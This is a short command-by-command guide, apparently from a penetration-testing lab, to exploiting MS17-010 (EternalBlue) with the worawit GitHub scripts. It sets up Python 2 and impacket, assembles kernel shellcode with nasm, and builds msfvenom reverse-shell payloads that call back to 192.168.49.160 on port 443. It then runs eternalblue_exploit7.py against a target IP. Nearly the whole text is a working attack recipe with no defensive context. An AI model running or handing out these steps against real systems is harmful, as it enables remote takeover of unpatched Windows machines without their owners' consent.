Source Code
Git Source: worawit/MS17-010 on GitHub
Initial Preparation
First, clone the git repo.
git clone https://github.com/worawit/MS17-010.git
Next, move into the cloned repo, create a Python 2 virtual environment, and install the impacket module into it. The exploit scripts are written for Python 2, so the virtual environment must be created with a Python 2 interpreter (a Python 3 venv would leave impacket installed outside the environment the scripts actually run under).
cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
python -m pip install impacket
The first step in preparing the exploit itself is to assemble the kernel shellcode into a flat binary with nasm (-f bin). This is done twice, once for each target architecture (x64 and x86).
nasm -f bin shellcode/eternalblue_kshellcode_x64.asm -o shellcode/sc_x64_kernel.bin
nasm -f bin shellcode/eternalblue_kshellcode_x86.asm -o shellcode/sc_x86_kernel.bin
Target-Specific Preparation
To finish preparing the exploit, repeat the following steps for each target.
First, generate a reverse-shell payload with msfvenom that matches the target's architecture.
x64:
msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x64 --format raw -o /var/tmp/sc_x64_payload.bin
x86:
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x86 --format raw -o /var/tmp/sc_x86_payload.bin
Then concatenate the kernel shellcode and the reverse-shell payload into a single file, kernel shellcode first.
x64:
cat shellcode/sc_x64_kernel.bin /var/tmp/sc_x64_payload.bin > /var/tmp/sc_x64.bin
x86:
cat shellcode/sc_x86_kernel.bin /var/tmp/sc_x86_payload.bin > /var/tmp/sc_x86.bin
Finally, run the exploit script appropriate for the target, passing the target IP address and the combined shellcode file for the matching architecture.
python2 eternalblue_exploit7.py 192.168.160.43 /var/tmp/sc_x86.bin